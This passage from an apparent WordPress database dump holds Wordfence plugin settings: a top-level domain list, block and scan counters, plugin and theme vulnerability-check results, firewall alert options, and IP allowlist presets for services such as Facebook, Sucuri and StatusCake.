arkets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','4894','yes'),('totalAlertsSent','39','yes'),('totalIPsBlocked','4892','yes'),('totalIPsLocked','38','yes'),('totalLoginHits','15286','yes'),('totalScansRun','110','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:4:{i:0;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"4.4.9\";s:11:\"fromVersion\";s:5:\"4.4.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.5.5\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:5:\"8.9.3\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}i:3;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:22:{i:0;a:4:{s:4:\"slug\";s:7:\"advance\";s:9:\"toVersion\";s:5:\"1.9.0\";s:11:\"fromVersion\";s:5:\"1.1.9\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:5:\"anima\";s:9:\"toVersion\";s:5:\"1.4.1\";s:11:\"fromVersion\";s:5:\"1.0.2\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:7:\"auberge\";s:9:\"toVersion\";s:5:\"2.7.6\";s:11:\"fromVersion\";s:5:\"2.1.1\";s:10:\"vulnerable\";b:0;}i:3;a:4:{s:4:\"slug\";s:6:\"cactus\";s:9:\"toVersion\";s:5:\"1.3.5\";s:11:\"fromVersion\";s:5:\"1.0.5\";s:10:\"vulnerable\";b:0;}i:4;a:4:{s:4:\"slug\";s:9:\"capacious\";s:9:\"toVersion\";s:5:\"1.1.1\";s:11:\"fromVersion\";s:5:\"0.0.4\";s:10:\"vulnerable\";b:0;}i:5;a:4:{s:4:\"slug\";s:5:\"event\";s:9:\"toVersion\";s:5:\"1.1.8\";s:11:\"fromVersion\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}i:6;a:4:{s:4:\"slug\";s:8:\"fastblog\";s:9:\"toVersion\";s:5:\"1.6.5\";s:11:\"fromVersion\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}i:7;a:4:{s:4:\"slug\";s:6:\"gambit\";s:9:\"toVersion\";s:5:\"2.0.4\";s:11:\"fromVersion\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}i:8;a:4:{s:4:\"slug\";s:6:\"hueman\";s:9:\"toVersion\";s:6:\"3.7.15\";s:11:\"fromVersion\";s:6:\"3.2.10\";s:10:\"vulnerable\";b:1;}i:9;a:4:{s:4:\"slug\";s:11:\"kidzoo-lite\";s:9:\"toVersion\";s:3:\"1.1\";s:11:\"fromVersion\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}i:10;a:4:{s:4:\"slug\";s:11:\"maxbusiness\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}i:11;a:4:{s:4:\"slug\";s:7:\"newsmag\";s:9:\"toVersion\";s:5:\"2.4.3\";s:11:\"fromVersion\";s:5:\"2.1.6\";s:10:\"vulnerable\";b:0;}i:12;a:4:{s:4:\"slug\";s:9:\"sg-window\";s:9:\"toVersion\";s:5:\"1.2.3\";s:11:\"fromVersion\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}i:13;a:4:{s:4:\"slug\";s:7:\"shopone\";s:9:\"toVersion\";s:3:\"1.3\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;}i:14;a:4:{s:4:\"slug\";s:9:\"spidermag\";s:9:\"toVersion\";s:5:\"1.1.6\";s:11:\"fromVersion\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}i:15;a:4:{s:4:\"slug\";s:8:\"storeone\";s:9:\"toVersion\";s:5:\"2.1.5\";s:11:\"fromVersion\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;}i:16;a:4:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}i:17;a:4:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"1.8\";s:11:\"fromVersion\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}i:18;a:4:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}i:19;a:4:{s:4:\"slug\";s:11:\"vision-lite\";s:9:\"toVersion\";s:5:\"1.1.6\";s:11:\"fromVersion\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}i:20;a:4:{s:4:\"slug\";s:6:\"weblog\";s:9:\"toVersion\";s:5:\"3.0.4\";s:11:\"fromVersion\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}i:21;a:4:{s:4:\"slug\";s:12:\"wp-barrister\";s:9:\"toVersion\";s:5:\"2.3.1\";s:11:\"fromVersion\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertLastSendTime','1626009534','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','learning-mode','yes'),('wfKillRequested','0','no'),('wfPeakMemory','23068672','no'),('wfScanStartVersion','5.7.3','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1631615573;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search 